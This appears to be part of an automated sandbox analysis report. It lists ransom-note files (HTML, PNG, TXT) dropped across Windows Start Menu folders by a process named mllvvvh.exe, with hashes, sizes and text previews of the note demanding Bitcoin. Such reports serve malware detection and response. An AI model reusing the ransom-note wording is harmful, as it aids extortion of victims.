                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):745272
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCU
                  MD5:38643A69A593611938C85BAF3337DA1B
                  SHA1:E8D9129D250AA084F4E9306B61445CF8B32BFA6C
                  SHA-256:BFE9D7F5AD7AC28E231D4E8F4FC4B7E06DF77EBB2D37340A2EDBF787383122DD
                  SHA-512:FC9C588F680CF48F740B6A78B0229B3240DCBA58474C6FD15576A28A182A5490DDF54C2B49CBE40DA4645F2A35396CF312A7B7BE7C60E1AD97135837D0F1B624
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23067
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5u
                  MD5:6F9EA1B719E526F11C182ACABF81BA36
                  SHA1:98A7C8C498E97259214638D80FBB5B7ACDC760BC
                  SHA-256:387BBB93DF73D3BAE44280C20D7CC23DB145F987185E92C811F2B8BB9A4A4F71
                  SHA-512:95018868B921382E2C6BFA1E5650612A5BA7E69923B6E36CFE373857AF66DB4D872E98E4E5AC1CF9690D84E1B6F458DC5E891DFA11DBD6984A32813E8FC0E21A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):86416
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkL
                  MD5:D1947FC8F79D881F20120CEAEFC511D4
                  SHA1:6B9F0AB836409FE6D8A60ACE0408E5AEB28810BB
                  SHA-256:A055F98EFBFE12F3FCA00A2D2A12797E8115DDCA16BBAE244E9F269C8F1FE2CC
                  SHA-512:1526825F15CDC94A36C4EDDC33EA4A113ED93D6842B8F8C56201C9FEED2B1B97F677DCF2E33ED9947CC398F08332BEEEC00572549E26FDA344415ABF0BA3B2DD
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):813024
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC5
                  MD5:65ED470E6AC4D7A0C231036045DA98D5
                  SHA1:A46A4256EAD116E2A9398494AC64E1FC4F4D746F
                  SHA-256:4CE9A7A8638BBE92047F805A47AB60ED0BA35CAD854DCFEE2664D3BBFF1DC36A
                  SHA-512:8220FC89B0FEED7AA3D52807E483D6A7E11F886A6EC899D5F646AA2B7359632AFE0BEC79416B4835A23C92FF150E7E83347646F69DAE10E5B5C07823553BB55B
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):25164
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:5BB3202EA02CDCC02A300245EFDDA4AD
                  SHA1:72A4EA5314E9656D4EA5791CAB7F3E6300EF3191
                  SHA-256:B2CD2CE84E7F89AC4C7E307BB1E8B769DD64AC5E862801E2F34F54E827968950
                  SHA-512:FB743F1C84D7EEA268ACDE000C3DBBF2DD1B731D9EA58D80FF7BA5965C969478C9E303DE85BC86B18983801D9EFBD70AE2208AB833E1923620B7B0C71E57985A
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):102128
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkGkGkGkGkGkL
                  MD5:6E4A9B603AC71B0AA51BB04B9D83190F
                  SHA1:7EC4D9E309FBB9A9232CA5EF59ABB6EC37B81CC8
                  SHA-256:8272D8BC8F3E59E4DBB5DC77583E0E4E40325738A874C3F1C5D3A628F2426FE4
                  SHA-512:FDE31D60F3B7CCCA0789897E54327C98F892D76BC54CFBFAC3F87F318D30B1965773297D9E6FAB3905365A46F55AF60A25799F4B03DEE2D7291DE164A5FF922C
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):880776
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:24576:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCio:xrZCrZCrZCrZCrZCrZCrZCrZCrZCrZC2
                  MD5:341F40B399F00E0AF5A4BEADF32B7120
                  SHA1:5E01494DE1ED990345DF9F24FA97EABF4C33D983
                  SHA-256:CDC9EE3DAC4DB6754A8B0CC93262448F8A96504B6DFA23E839114ADF1746CC5D
                  SHA-512:A7009D5D924E56ADBDCA7C82211BC54C3B48EF882E7C51CD09BEE0A192F9E3EDB23056651C1EE85A561B4F1981FCDC8036BBD45237558F7B059DD6E4282BAAAC
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):27261
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5/5/5/5/5/5u
                  MD5:96A14B1FF2E7F26DBAEBDDCEAE2FC7E8
                  SHA1:6D12C7359E07920E05F48DBA2234925A44C97002
                  SHA-256:58BE62FFFC31F50B7A8A7FAF3BDFAFD99669A10E6C0C6FF94AB4B5B63513B802
                  SHA-512:D43E760284A353B8AFE0246DCEC288C08CCEA3BEF248195DCBB8104BADB5DCD8C13EB4F5CF413EA9A13F83682A60D7931F8E9C53642A8E3F7719C3F27E31ECF0
                  Malicious:false
